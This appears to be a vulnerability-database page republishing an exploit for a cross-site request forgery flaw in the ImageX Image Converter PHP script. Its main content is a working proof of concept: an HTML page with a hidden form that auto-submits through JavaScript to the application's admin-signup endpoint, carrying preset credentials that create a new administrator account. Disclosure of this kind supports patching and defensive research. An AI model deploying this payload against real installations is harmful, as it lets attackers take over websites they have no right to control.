Lucene search
K

ImageX Image Converter Cross Site Request Forgery

🗓️ 07 Mar 2025 00:00:00Reported by Buğra Enis DönmezType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 269 Views

ImageX Image Converter is vulnerable to Cross Site Request Forgery allowing unauthorized admin access.

Code
Exploit Title: ImageX - Image Converter - Cross Site Request Forgery (CSRF) (Add Admin)
    Date: 05-03-2025
    Exploit Author: Buğra Enis Dönmez
    Vendor Homepage: https://www.codester.com/items/48649/imagex-image-converter-120-formats-php-script
    Version: latest
    Tested on: Arch Linux
    #####################################  CSRF PoC #####################################
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <h1>CSRF PoC</h1>
        <form id="csrfForm" action="https://localhost/mega-img-converter/actions/regadminsignupauth.php" method="POST" enctype="multipart/form-data">
            <input type="hidden" name="name" value="[email protected]" />
            <input type="hidden" name="lastname" value="neci" />
            <input type="hidden" name="email" value="[email protected]" />
            <input type="hidden" name="password" value="kenan5" />
            <input type="hidden" name="confirmpassword" value="kenan5" />
            <input type="hidden" name="isajax" value="someValue" />
        </form>
        <script>
            document.getElementById('csrfForm').submit();
        </script>
    </body>
    </html>
    
    #####################################  CSRF PoC Ended #####################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation